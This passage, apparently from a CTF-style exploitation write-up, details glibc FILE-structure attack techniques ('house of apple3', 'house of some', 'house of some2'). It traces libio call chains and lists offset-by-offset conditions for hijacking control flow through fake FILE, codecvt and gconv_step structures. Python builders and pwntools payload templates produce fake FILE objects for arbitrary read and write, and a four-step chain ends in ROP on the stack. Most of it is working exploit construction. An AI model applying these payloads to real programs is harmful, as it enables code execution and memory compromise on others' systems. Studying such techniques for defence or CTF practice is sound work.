codecvt->__cd_in.step_data.__outbufend = (unsigned char *) to_end;
codecvt->__cd_in.step_data.__statep = statep;

__gconv_fct fct = gs->__fct;
#ifdef PTR_DEMANGLE
// if gs->__shlib_handle is non-NULL, fct is demangled with __pointer_guard
// if this field is controllable, set it to NULL to skip the demangling
if (gs->__shlib_handle != NULL)
PTR_DEMANGLE (fct);
#endif
// a function pointer is called here
// the macro simply calls fct(gs, ...)
status = DL_CALL_FCT (fct,
(gs, &codecvt->__cd_in.step_data, &from_start_copy,
(const unsigned char *) from_end, NULL,
&dummy, 0, 0));
// ......
}
Here __gconv_fct and DL_CALL_FCT are defined as:
/* Type of a conversion function.  */
typedef int (*__gconv_fct) (struct __gconv_step *, struct __gconv_step_data *,
const unsigned char **, const unsigned char *,
unsigned char **, size_t *, int, int);

#ifndef DL_CALL_FCT
# define DL_CALL_FCT(fct, args) fct args
#endif
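The offsets used in the house of apple3 summaries follow directly from these definitions and can be recomputed with ctypes. The sketch below mirrors the structures for a 64-bit Linux target; the Python class names are illustrative, function pointers are modelled as plain pointers, and __mbstate_t is modelled as an int followed by a 4-byte union, which is an assumption about its layout.

```python
import ctypes as C


class MbState(C.Structure):              # __mbstate_t: int + 4-byte union (assumed)
    _fields_ = [("count", C.c_int), ("value", C.c_uint32)]


class GconvStepData(C.Structure):        # struct __gconv_step_data
    _fields_ = [
        ("outbuf", C.c_void_p),
        ("outbufend", C.c_void_p),
        ("flags", C.c_int),
        ("invocation_counter", C.c_int),
        ("internal_use", C.c_int),
        ("statep", C.c_void_p),
        ("state", MbState),
    ]


class IconvT(C.Structure):               # _IO_iconv_t
    _fields_ = [("step", C.c_void_p), ("step_data", GconvStepData)]


class Codecvt(C.Structure):              # struct _IO_codecvt
    _fields_ = [("cd_in", IconvT), ("cd_out", IconvT)]


class GconvStep(C.Structure):            # struct __gconv_step
    _fields_ = [
        ("shlib_handle", C.c_void_p), ("modname", C.c_void_p),
        ("counter", C.c_int),
        ("from_name", C.c_void_p), ("to_name", C.c_void_p),
        ("fct", C.c_void_p), ("btowc_fct", C.c_void_p),
        ("init_fct", C.c_void_p), ("end_fct", C.c_void_p),
        ("min_needed_from", C.c_int), ("max_needed_from", C.c_int),
        ("min_needed_to", C.c_int), ("max_needed_to", C.c_int),
        ("stateful", C.c_int), ("data", C.c_void_p),
    ]


print(hex(Codecvt.cd_out.offset))        # offset of __cd_out (and of __cd_out.step)
print(hex(GconvStep.fct.offset))         # offset of __fct
print(hex(GconvStep.stateful.offset))    # offset of __stateful
```

On a 64-bit interpreter this gives the offsets of __cd_out.step inside struct _IO_codecvt and of __fct and __stateful inside struct __gconv_step, so the constants in a payload do not have to be taken on trust.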
_IO_wfile_underflow

  • Call chain
  1. _IO_wfile_underflow

    wint_t
    _IO_wfile_underflow (FILE *fp)
    {
    struct _IO_codecvt *cd;
    enum __codecvt_result status;
    ssize_t count;

    /* C99 requires EOF to be "sticky". */

    // must not enter this branch
    if (fp->_flags & _IO_EOF_SEEN)
    return WEOF;
    // must not enter this branch
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // must not enter this branch
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    // must enter this branch
    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr < fp->_IO_read_end)
    {
    /* There is more in the external. Convert it. */
    const char *read_stop = (const char *) fp->_IO_read_ptr;

    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;
    // execution must reach this call
    status = __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    // ......
    }
    }

  2. __libio_codecvt_in

  3. DL_CALL_FCT

  4. gs = fp->_codecvt->__cd_in.step

  5. *(gs->__fct)(gs)

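In summary:

  • Set _flags to ~(4 | 0x10).
  • Set vtable to the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset) so that _IO_wfile_underflow is the function that gets called.
  • fp->_IO_read_ptr < fp->_IO_read_end, i.e. *(fp + 8) < *(fp + 0x10).
  • Keep _wide_data at its default, or set it to a controlled heap address A, i.e. *(fp + 0xa0) = A.
  • _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end, i.e. *A >= *(A + 8).
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B.
  • Set codecvt->__cd_in.step to a controlled heap address C, i.e. *B = C.
  • Set codecvt->__cd_in.step->__shlib_handle to 0, i.e. *C = 0.
  • Set codecvt->__cd_in.step->__fct to the address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C. If _wide_data is also controllable, rsi can be controlled as well.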
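As a concrete picture of this field list, the sketch below packs a fake FILE, a fake struct _IO_codecvt and a fake struct __gconv_step with the standard library. It assumes the x86-64 sizes 0xe0, 0x70 and 0x68 for the three objects. The function name and all addresses are hypothetical, the wide-data area at A is assumed to be zero-filled so that *A >= *(A + 8) holds, and fields not named in the list are left at zero.

```python
import struct


def apple3_underflow_layout(wfile_jumps, wide_addr, codecvt_addr, step_addr, target):
    """Fake FILE, _IO_codecvt and __gconv_step for the _IO_wfile_underflow path."""
    fp = bytearray(0xE0)
    struct.pack_into("<I", fp, 0x00, 0)                # _flags: bits 4 and 0x10 clear
    struct.pack_into("<Q", fp, 0x08, 0)                # _IO_read_ptr
    struct.pack_into("<Q", fp, 0x10, 1)                # _IO_read_end > _IO_read_ptr
    struct.pack_into("<Q", fp, 0x98, codecvt_addr)     # _codecvt = B
    struct.pack_into("<Q", fp, 0xA0, wide_addr)        # _wide_data = A
    struct.pack_into("<Q", fp, 0xD8, wfile_jumps)      # vtable

    codecvt = bytearray(0x70)                          # struct _IO_codecvt at B
    struct.pack_into("<Q", codecvt, 0x00, step_addr)   # __cd_in.step = C

    step = bytearray(0x68)                             # struct __gconv_step at C
    struct.pack_into("<Q", step, 0x00, 0)              # __shlib_handle = NULL: no PTR_DEMANGLE
    struct.pack_into("<Q", step, 0x28, target)         # __fct = D
    return bytes(fp), bytes(codecvt), bytes(step)
```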

_IO_wfile_underflow_mmap

  • Call chain
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;
    // must not enter this branch
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // must not enter this branch
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    // preferably do not enter this branch
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    // preferably do not enter this branch
    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp); // skipped on this path, since _IO_buf_base is non-NULL
    }
    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;

    // execution must reach this call
    __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    //......
    }
    Conditions:
  • (fp->_flags & _IO_NO_READS) == 0
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_buf_base != NULL
  2. __libio_codecvt_in

  3. DL_CALL_FCT

  4. gs = fp->_codecvt->__cd_in.step

  5. *(gs->__fct)(gs)

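In summary:

  • Set _flags to ~4.
  • Set vtable to the address of _IO_wfile_jumps_mmap (plus or minus an offset) so that _IO_wfile_underflow_mmap is the function that gets called.
  • fp->_IO_read_ptr < fp->_IO_read_end, i.e. *(fp + 8) < *(fp + 0x10).
  • Keep _wide_data at its default, or set it to a controlled heap address A, i.e. *(fp + 0xa0) = A.
  • _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end, i.e. *A >= *(A + 8).
  • Set _wide_data->_IO_buf_base to a non-zero value, i.e. *(A + 0x30) != 0.
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B.
  • Set codecvt->__cd_in.step to a controlled heap address C, i.e. *B = C.
  • Set codecvt->__cd_in.step->__shlib_handle to 0, i.e. *C = 0.
  • Set codecvt->__cd_in.step->__fct to the address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C. If _wide_data is also controllable, rsi can be controlled as well.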

_IO_wdo_write

  • Call chain
  1. _IO_new_file_sync
    int
    _IO_new_file_sync (FILE *fp)
    {
    ssize_t delta;
    int retval = 0;

    /* char* ptr = cur_ptr(); */
    if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF; // execution must reach this call
    //......
    }
    Conditions:
  • fp->_IO_write_ptr > fp->_IO_write_base
  2. _IO_do_flush
    #define _IO_do_flush(_f) \
    ((_f)->_mode <= 0 \
    ? _IO_do_write(_f, (_f)->_IO_write_base, \
    (_f)->_IO_write_ptr-(_f)->_IO_write_base) \
    : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base, \
    ((_f)->_wide_data->_IO_write_ptr \
    - (_f)->_wide_data->_IO_write_base)))
    Conditions:
  • fp->_mode > 0
  • the second argument is then fp->_wide_data->_IO_write_base
  • the third argument is fp->_wide_data->_IO_write_ptr - fp->_wide_data->_IO_write_base
  3. _IO_wdo_write
    int
    _IO_wdo_write (FILE *fp, const wchar_t *data, size_t to_do)
    {
    struct _IO_codecvt *cc = fp->_codecvt;

    // the third argument must be greater than 0
    if (to_do > 0)
    {
    if (fp->_IO_write_end == fp->_IO_write_ptr
    && fp->_IO_write_end != fp->_IO_write_base)
    {// must not enter this branch
    if (_IO_new_do_write (fp, fp->_IO_write_base,
    fp->_IO_write_ptr - fp->_IO_write_base) == EOF)
    return WEOF;
    }

    // ......

    /* Now convert from the internal format into the external buffer. */
    // execution must reach this call
    result = __libio_codecvt_out (cc, &fp->_wide_data->_IO_state,
    data, data + to_do, &new_data,
    write_ptr,
    buf_end,
    &write_ptr);
    //......
    }
    }
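    Conditions:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  • fp->_IO_write_end == fp->_IO_write_ptr && fp->_IO_write_end != fp->_IO_write_base is false
  4. __libio_codecvt_out

  5. DL_CALL_FCT

  6. gs = fp->_codecvt->__cd_out.step

  7. *(gs->__fct)(gs)

In summary:

  • Set _flags to ~4.
  • Set vtable to the address of _IO_file_jumps (plus or minus an offset) so that _IO_new_file_sync is the function that gets called.
  • _IO_write_ptr > _IO_write_base, i.e. *(fp + 0x28) > *(fp + 0x20), so that _IO_new_file_sync calls _IO_do_flush.
  • _mode > 0, i.e. *(fp + 0xc0) > 0.
  • _IO_write_end != _IO_write_ptr or _IO_write_end == _IO_write_base, i.e. *(fp + 0x30) != *(fp + 0x28) or *(fp + 0x30) == *(fp + 0x20).
  • Set _wide_data to a heap address A, i.e. *(fp + 0xa0) = A.
  • _wide_data->_IO_write_ptr > _wide_data->_IO_write_base (to_do must be greater than 0), i.e. *(A + 0x20) > *(A + 0x18).
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B.
  • Set codecvt->__cd_out.step to a controlled heap address C, i.e. *(B + 0x38) = C, because __libio_codecvt_out takes its step from __cd_out.
  • Set codecvt->__cd_out.step->__shlib_handle to 0, i.e. *C = 0.
  • Set codecvt->__cd_out.step->__fct to the address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C. If _wide_data is also controllable, rsi can be controlled as well.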

_IO_wfile_sync

  • Call chain
  1. _IO_wfile_sync
    wint_t
    _IO_wfile_sync (FILE *fp)
    {
    ssize_t delta;
    wint_t retval = 0;

    /* char* ptr = cur_ptr(); */
    // do not enter this branch
    if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
    if (_IO_do_flush (fp))
    return WEOF;
    delta = fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end;
    // must enter this branch
    if (delta != 0)
    {
    /* We have to find out how many bytes we have to go back in the
    external buffer. */
    struct _IO_codecvt *cv = fp->_codecvt;
    off64_t new_pos;

    // simply make this return -1
    int clen = __libio_codecvt_encoding (cv);

    if (clen > 0)
    /* It is easy, a fixed number of input bytes are used for each
    wide character. */
    delta *= clen;
    else
    {
    /* We have to find out the hard way how much to back off.
    To do this we determine how much input we needed to
    generate the wide characters up to the current reading
    position. */
    int nread;
    size_t wnread = (fp->_wide_data->_IO_read_ptr
    - fp->_wide_data->_IO_read_base);
    fp->_wide_data->_IO_state = fp->_wide_data->_IO_last_state;
    // execution must reach this call
    nread = __libio_codecvt_length (cv, &fp->_wide_data->_IO_state,
    fp->_IO_read_base,
    fp->_IO_read_end, wnread);
    // ......

    }
    }
    }
    Conditions:
  • fp->_wide_data->_IO_write_ptr <= fp->_wide_data->_IO_write_base
  • fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end != 0
  • clen <= 0
    int
    __libio_codecvt_encoding (struct _IO_codecvt *codecvt)
    {
    /* See whether the encoding is stateful. */
    if (codecvt->__cd_in.step->__stateful)
    return -1;
    /* Fortunately not. Now determine the input bytes for the conversion
    necessary for each wide character. */
    if (codecvt->__cd_in.step->__min_needed_from
    != codecvt->__cd_in.step->__max_needed_from)
    /* Not a constant value. */
    return 0;

    return codecvt->__cd_in.step->__min_needed_from;
    }
  • fp->_codecvt->__cd_in.step->__stateful != 0
  2. __libio_codecvt_length

  3. DL_CALL_FCT

  4. gs = fp->_codecvt->__cd_in.step

  5. *(gs->__fct)(gs)

In summary:

  • Set _flags to ~(4 | 0x10).
  • Set vtable to the address of _IO_wfile_jumps (plus or minus an offset) so that _IO_wfile_sync is the function that gets called.
  • Set _wide_data to a heap address A, i.e. *(fp + 0xa0) = A.
  • _wide_data->_IO_write_ptr <= _wide_data->_IO_write_base, i.e. *(A + 0x20) <= *(A + 0x18).
  • _wide_data->_IO_read_ptr != _wide_data->_IO_read_end, i.e. *A != *(A + 8).
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B.
  • Set codecvt->__cd_in.step to a controlled heap address C, i.e. *B = C.
  • Set codecvt->__cd_in.step->__stateful to a non-zero value, i.e. *(C + 0x58) != 0 (the field lives in the __gconv_step at C, not in the _IO_codecvt at B).
  • Set codecvt->__cd_in.step->__shlib_handle to 0, i.e. *C = 0.
  • Set codecvt->__cd_in.step->__fct to the address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C, and rsi is &codecvt->__cd_in.step_data, which is controllable.
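The clen <= 0 requirement is the least obvious condition on this path, so here is a direct Python transcription of __libio_codecvt_encoding together with a simplified model of the branch tests in _IO_wfile_sync. The second function is an illustration only: its name and parameters are made up, and it follows the notes in treating the _IO_do_flush branch as something to avoid rather than modelling what happens inside it.

```python
def codecvt_encoding(stateful, min_needed_from, max_needed_from):
    """Transcription of __libio_codecvt_encoding."""
    if stateful:
        return -1                   # stateful encoding
    if min_needed_from != max_needed_from:
        return 0                    # not a constant number of bytes per character
    return min_needed_from


def sync_reaches_codecvt_length(w_write_ptr, w_write_base, w_read_ptr, w_read_end,
                                stateful, min_needed_from=1, max_needed_from=1):
    """Simplified model of the path to __libio_codecvt_length."""
    if w_write_ptr > w_write_base:
        return False                # the notes avoid the _IO_do_flush branch
    if w_read_ptr == w_read_end:
        return False                # delta == 0
    return codecvt_encoding(stateful, min_needed_from, max_needed_from) <= 0


print(sync_reaches_codecvt_length(0, 0, 8, 0, stateful=1))
```

Leaving __stateful at 0 with equal non-zero __min_needed_from and __max_needed_from would make clen positive and skip the call, which is why the summary sets __stateful.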

house of some(house of apple2 plus)

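  • Requirements
    1. The glibc base address is known
    2. A controllable known address (content can be written there to build a fake_IO_file)
    3. One write of a controlled address to an arbitrary address inside libc
    4. The program exits normally or through exit()
  • Advantages:
    1. Unaffected by the current IO_validate_vtable check (it would still work if a check were added to the wide_data vtable)
    2. The first arbitrary write has low requirements
    3. The final stage is ROP on the stack, so no stack pivot is needed
    4. A source-level attack that does not depend on how libc was compiled

The technique uses the function _IO_new_file_underflow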

int  
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;

/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);

if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);

_IO_release_lock (stdout);
}

_IO_switch_to_get_mode (fp);

/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
This calls the macro _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base), whose regular read implementation is:
ssize_t  
_IO_file_read (FILE *fp, void *buf, ssize_t size)
{
return (__builtin_expect (fp->_flags2 & _IO_FLAGS2_NOTCANCEL, 0)
? __read_nocancel (fp->_fileno, buf, size)
: __read (fp->_fileno, buf, size));
}
All three arguments of read are controllable:
  • fd => fp->_fileno
  • buf => fp->_IO_buf_base
  • size => fp->_IO_buf_end - fp->_IO_buf_base

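In the for loop of _IO_flush_all, the singly linked list headed by _IO_list_all is chained together through _chain. Every FILE on the list is visited, and _IO_OVERFLOW(fp, EOF) is called for each one that satisfies the condition

_IO_new_file_underflow calls _IO_switch_to_get_mode, which contains this branch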

if (fp->_IO_write_ptr > fp->_IO_write_base)  
if (_IO_OVERFLOW (fp, EOF) == EOF)
return EOF;
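If fp->_IO_write_ptr > fp->_IO_write_base were used again to trigger OVERFLOW, the calls would recurse forever, so that is not an option. The other branch has to be taken instead:
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) // not usable
|| (_IO_vtable_offset (fp) == 0 // use the branch after the ||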
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
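Conditions for the read()-based primitive (it reads from fd 0 into a chosen range, which gives the arbitrary-address write):

  • Set _flags to ~(2 | 0x8 | 0x800); 0 works (same as apple2).
  • Set vtable to the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap so that _IO_wfile_overflow is called (unlike apple2, no offset may be applied to the vtable here, otherwise the _IO_SYSREAD call is disturbed).
  • Set _wide_data->_IO_write_base to 0, i.e. *(_wide_data + 0x18) = 0 (same as apple2).
  • Set _wide_data->_IO_write_ptr greater than _wide_data->_IO_write_base, i.e. *(_wide_data + 0x20) > *(_wide_data + 0x18) (this differs from apple2).
  • Set _wide_data->_IO_buf_base to 0, i.e. *(_wide_data + 0x30) = 0 (same as apple2).
  • Set _wide_data->_wide_vtable to any table whose doallocate slot resolves to _IO_new_file_underflow. The stock vtables already provide one: _IO_file_jumps - 0x48 works.
  • Set _vtable_offset to 0.
  • Set _IO_buf_base and _IO_buf_end to the address range to be written.
  • Set _chain to the address of the next fake file to trigger.
  • _IO_write_ptr <= _IO_write_base.
  • Set _fileno to 0, meaning read(0, buf, size).
  • Set _mode to 2; any value satisfying fp->_mode > 0 works.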

Arbitrary-address write

fake_file_read = flat({  
0x00: 0, # _flags
0x20: 0, # _IO_write_base
0x28: 0, # _IO_write_ptr

0x38: write_start, # _IO_buf_base (placeholder: start of the region to overwrite)
0x40: write_end, # _IO_buf_end (placeholder: end of the region to overwrite)

0x70: 0, # _fileno
0x82: b"\x00", # _vtable_offset
0xc0: 2, # _mode
0xa0: wide_data_addr, # _wide_data (placeholder: address of fake_wide_data)
0x68: next_fake_file, # _chain (placeholder: address of the next fake file to trigger)
0xd8: _IO_wfile_jumps, # vtable
}, filler=b"\x00")

fake_wide_data = flat({
0xe0: _IO_file_jumps - 0x48,
0x18: 0,
0x20: 1,
0x30: 0,
}, filler=b"\x00")
Arbitrary-address read
fake_file_write = flat({  
0x00: 0x800 | 0x1000, # _flags

0x20: leak_start, # _IO_write_base (placeholder: start of the region to leak)
0x28: leak_end, # _IO_write_ptr (placeholder: end of the region to leak)

0x70: 1, # _fileno
0x68: next_fake_file, # _chain (placeholder: address of the next fake file to trigger)
0xd8: _IO_file_jumps, # vtable
}, filler=b"\x00")
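The two templates above rely on pwntools' flat(). For checking offsets without pwntools, the following standard-library sketch builds the same three objects. The helper flat64 is a hypothetical stand-in that writes 8-byte little-endian values (or raw bytes) at the given offsets and zero-fills the rest; all addresses are placeholders supplied by the caller, and the sizes 0xe0 and 0xe8 are the assumed x86-64 sizes of the FILE (with vtable) and of _IO_wide_data.

```python
import struct


def flat64(fields, size):
    """Stand-in for flat(): {offset: int or bytes} -> zero-filled bytes."""
    buf = bytearray(size)
    for offset, value in fields.items():
        if isinstance(value, bytes):
            buf[offset:offset + len(value)] = value
        else:
            struct.pack_into("<Q", buf, offset, value)
    return bytes(buf)


def fake_file_read(write_start, write_end, wide_data_addr, next_file, wfile_jumps):
    """FILE whose flush ends in read(0, write_start, write_end - write_start)."""
    return flat64({
        0x00: 0, 0x20: 0, 0x28: 0,            # _flags, _IO_write_base, _IO_write_ptr
        0x38: write_start, 0x40: write_end,   # _IO_buf_base, _IO_buf_end
        0x68: next_file, 0x70: 0,             # _chain, _fileno
        0x82: b"\x00",                        # _vtable_offset
        0xA0: wide_data_addr, 0xC0: 2,        # _wide_data, _mode
        0xD8: wfile_jumps,                    # vtable
    }, 0xE0)


def fake_wide_data(file_jumps):
    """Wide data whose doallocate slot resolves to _IO_file_jumps' underflow."""
    return flat64({0x18: 0, 0x20: 1, 0x30: 0, 0xE0: file_jumps - 0x48}, 0xE8)


def fake_file_write(leak_start, leak_end, next_file, file_jumps):
    """FILE whose flush writes [leak_start, leak_end) to fd 1."""
    return flat64({
        0x00: 0x800 | 0x1000,                 # _flags
        0x20: leak_start, 0x28: leak_end,     # _IO_write_base, _IO_write_ptr
        0x68: next_file, 0x70: 1,             # _chain, _fileno
        0xD8: file_jumps,                     # vtable
    }, 0xE0)
```

Chaining is then a matter of passing the address where the next fake file will live as next_file, exactly as the _chain field is used in the attack flow.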

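Attack flow

  • Step 1: arbitrary write to a _chain. The target can be _IO_list_all or the _chain field of stdin, stdout or stderr. Beforehand, place an arbitrary-write fake_IO_file at a controlled address, then write the address of that fake_IO_file to one of those locations
  • Step 2: extend the fake_IO_file chain and leak a stack address. After step 1 there is only one fake_IO_file, which cannot perform anything more complex, so this step writes two fake_IO_files: one leaks the value stored in environ (a stack address), the other writes in the next fake_IO_file
  • Step 3: leak stack contents and find where the ROP chain should start. This step also writes two fake_IO_files: one arbitrary read of stack memory, and one arbitrary write that puts the ROP chain on the stack
  • Step 4: write the ROP chain and carry out the ROP attack on the stack. (Figure: houseofsome1.png)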

house of some2

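The function of interest is _IO_wfile_underflow_maybe_mmap in _IO_wfile_jumps_maybe_mmap

Requirements:
    1. The libc address is known
    2. A controllable address (a fake file can be written there)
    3. Control over the stdout pointer or the _IO_2_1_stdout_ structure
    4. The program calls an output function such as printf or puts

Advantages:
    1. Like House of Some, it bypasses the current vtable check
    2. printf and puts are common, so it applies widely
    3. Control flow is hijacked on the stack, which leads into House of Some for the final attack

Start with the function _IO_wfile_underflow_maybe_mmap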

wint_t  
_IO_wfile_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Doing the underflow will choose mmap
or vanilla operations and then punt to the chosen underflow routine.
Then we can punt to ours. */
if (_IO_file_underflow_maybe_mmap (fp) == EOF)
return WEOF;

return _IO_WUNDERFLOW (fp);
}
It ends by calling _IO_WUNDERFLOW through the vtable inside _wide_data. Next, look into the function _IO_file_underflow_maybe_mmap
int  
_IO_file_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Choose mmap or vanilla operations
and then punt to the chosen underflow routine. */
decide_maybe_mmap (fp);
return _IO_UNDERFLOW (fp);
}
It ends by calling _IO_UNDERFLOW through the FILE vtable. Next, look into the function decide_maybe_mmap
static void  
decide_maybe_mmap (FILE *fp)
{
/* We use the file in read-only mode. This could mean we can
mmap the file and use it without any copying. But not all
file descriptors are for mmap-able objects and on 32-bit
machines we don't want to map files which are too large since
this would require too much virtual memory. */
struct __stat64_t64 st;

if (_IO_SYSSTAT (fp, &st) == 0
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))
{
/* Try to map the file. */
void *p;
// ...... (this part mainly performs the mmap)
}

/* We couldn't use mmap, so revert to the vanilla file operations. */

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
}
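There is a key _IO_SYSSTAT call, and at its end the function restores the vtables of both the FILE and its _wide_data

To sum up, a FILE that enters _IO_wfile_underflow_maybe_mmap goes through the following steps:
    1. _IO_SYSSTAT(fp, &st) is called through the vtable, with a stack pointer as argument
    2. decide_maybe_mmap finishes and restores both vtables
    3. _IO_UNDERFLOW (fp) is called through the vtable
    4. _IO_WUNDERFLOW (fp) is called through the vtable

In the _IO_UNDERFLOW function of the _IO_file_jumps vtable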

count = _IO_SYSREAD (fp, fp->_IO_buf_base,  
fp->_IO_buf_end - fp->_IO_buf_base);
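At this step all three arguments are controllable, so data can be written to an arbitrary address

printf and puts eventually call the __xsputn entry of stdout's vtable. What if the __xsputn slot is made to land directly on __underflow? The slots then shift as follows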

__xsputn -> __underflow  
__stat -> __write
To get this shift, change stdout's vtable to _IO_wfile_jumps_maybe_mmap-0x18
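The shift of 0x18 is the distance between two slots of struct _IO_jump_t. The sketch below lists the slots in their glibc order (8 bytes each on x86-64) and computes both the pointer adjustment needed to redirect one slot to another and the slot that a given call actually lands on after the adjustment. The helper names vtable_shift and lands_on are illustrative. The same arithmetic produces the _IO_file_jumps - 0x48 value used for the wide vtable in House of Some.

```python
SLOTS = [
    "__dummy", "__dummy2", "__finish", "__overflow", "__underflow",
    "__uflow", "__pbackfail", "__xsputn", "__xsgetn", "__seekoff",
    "__seekpos", "__setbuf", "__sync", "__doallocate", "__read",
    "__write", "__seek", "__close", "__stat", "__showmanyc", "__imbue",
]
OFFSET = {name: 8 * index for index, name in enumerate(SLOTS)}


def vtable_shift(called, wanted):
    """Amount to add to the table pointer so that `called` runs `wanted`."""
    return OFFSET[wanted] - OFFSET[called]


def lands_on(called, shift):
    """Slot executed when `called` is invoked through a shifted table pointer."""
    return SLOTS[(OFFSET[called] + shift) // 8]


shift = vtable_shift("__xsputn", "__underflow")
print(hex(shift), lands_on("__stat", shift))
print(hex(vtable_shift("__doallocate", "__underflow")))
```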

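In the call sequence above, _IO_SYSSTAT(fp, &st) then becomes write(fp, &st, ??). If rdx were controllable, this would already leak stack data

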